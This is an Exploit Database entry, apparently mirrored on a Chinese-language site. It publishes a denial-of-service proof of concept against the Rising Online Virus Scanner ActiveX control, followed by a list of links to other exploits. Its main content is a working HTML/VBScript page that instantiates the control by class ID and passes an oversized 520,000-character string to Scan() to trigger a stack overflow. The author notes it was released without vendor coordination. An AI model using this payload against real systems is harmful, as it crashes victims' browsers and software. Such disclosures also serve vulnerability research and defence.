Rising Online Virus Scanner 22.0.0.5 – ActiveX Control Stack Overflow (Denial of Service)

Exploit Database
93 阅读

作者： wirebonder

日期： 2010-02-18
类别：
- dos
平台：
- windows
来源：https://www.exploit-db.com/exploits/11492/

# Exploit Title: Rising Online Virus Scanner ActiveX Control DoS (Stack overflow)
# Author: wirebonder
# Software Link: http://www.rising-global.com/products/online-scanner-intro.html
# Tested on: Windows XP sp3


##
# ProgID: 	RavOLCtlLib.RavOnline
# ClassID:	9FAFB576-6933-4CCC-AB3D-B988EC43D04E
# Member: 	Scan()
# File: 	C:\Programme\Rising\RavOL\RavOLCtl.dll
# script safe:	true
# init safe: 	true
#
# Because Bullshit like this is unsaleable and i don't want to waste time
# coordinating patches with this vendor this is a fulldisc publishing.
##

<html>
<body>
<object classid='clsid:9FAFB576-6933-4CCC-AB3D-B988EC43D04E' id='obj'></object>
<script language='vbscript'>
	buf=String(520000, "A")
	obj.Scan buf
</script>
</body>
</html>

last Exploits
Rising Online Virus Scanner 22.0.0.5 – ActiveX Control Stack Overflow (Denial of Service)的更多信息

Cyberoam General Authentication Client 2.1.2.7 – ‘Server Address’ Denial of Service (PoC)：
Jolix Media Player 1.1.0 – ‘.m3u’ Denial of Service：
IrfanView – ‘.tiff’ Image Processing Buffer Overflow：
Microsoft Edge Chakra JIT – ‘Array.prototype.reverse’ Array Type Confusion：
MP4 Player 4.0 – Local Crash (PoC)：
Rocket Software UniData 7.2.7.3806 – Denial of Service：
Apple WebKit – ‘HTMLFormElement::reset()’ Use-After Free：
NTPsec 1.1.2 – ‘ctl_getitem’ Out-of-Bounds Read (PoC)：